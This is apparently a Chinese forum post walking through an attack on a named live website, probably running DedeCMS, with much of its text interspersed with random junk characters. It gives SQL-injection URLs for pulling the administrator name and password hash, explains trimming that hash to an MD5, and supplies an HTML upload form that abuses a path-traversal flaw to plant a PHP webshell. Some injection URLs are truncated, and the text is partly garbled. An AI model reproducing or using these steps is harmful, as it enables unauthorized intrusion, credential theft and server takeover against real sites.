①注入漏洞。2 a) ~4 X9 r5 D8 c" d3 M& ~' C7 g; Y
这站 http://www.political-security.com/& D, D' b8 v$ q5 p9 _4 e" Q: a
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,- `# G% Z& Q6 I' k. g: I8 m/ v1 w
www.political-security.com/data/mysql_error_trace.inc 爆后台
# \- i# G: r# ~5 g$ \5 e) ?3 V然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
: r) R2 T8 c! P7 k. s然后写上语句 9 C" {- ~! ^; C+ L; T& _2 z
查看管理员帐号9 ~# Y. X5 H9 O5 e9 H: A/ y
http://www.political-security.co ... &membergroup=@`
, x8 i/ Y+ I3 ~4 K- |3 A3 W# z
; u' w1 v9 e7 C5 v: g- G% iadmin % e/ q) q- m" }4 E @ F
5 [3 I) J' v& U6 U1 z/ A$ c/ x6 g" ~7 N
查看管理员密码1 k3 E$ C/ A) {. ^8 Y6 A3 x
http://www.political-security.co ... &membergroup=@`1 G; K$ {: z+ B% r
( o x# C8 o) V- ~# h
8d29b1ef9f8c5a5af429
7 y4 [ @4 O# F" N( ]& S4 K& i. c
( E+ K3 |9 ~. y2 z' y9 k% x5 U查看管理员密码
5 e' [; k/ s" U$ Z! P* X1 P; ?' {
5 X6 i- D& E2 d5 z4 s( V得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
/ ]+ w5 K" H( `" A: O. Q/ {0 @
) l2 l( _% |+ d; U1 ~; _8d2% R x7 C% c0 Y q
9b1ef9f8c5a5af42 Q2 a3 o B& l+ Q* C7 H
9# q5 B6 ]5 t: t* b
+ v4 K- y- j7 \+ c/ u$ o i& \
cmd5没解出来 只好测试第二个方法
/ b) x2 ]- ?+ {- S( M/ Z8 [+ l( s
$ n, ?! |+ N+ M9 A9 b
$ _# U4 P1 X3 J9 o+ @②上传漏洞:
4 ?% _- [' W5 L, q/ ]3 b: A$ r4 T/ u+ s- j/ Y: `
只要登陆会员中心,然后访问页面链接( b3 x7 |3 O. R. Y9 T; x
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”' M3 w; g7 Q4 s S/ q; L
! @2 g" S: b" |. I如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”1 ~' e4 W" x& _) W1 t+ m
* K% B: m8 b; O3 P7 l7 m于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
4 |/ Q4 _9 G3 X* a
/ n I. _# g( E<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ c; D6 c0 h) K" F' w或者
3 P/ W; W2 G. B; O% a即可上传成功 |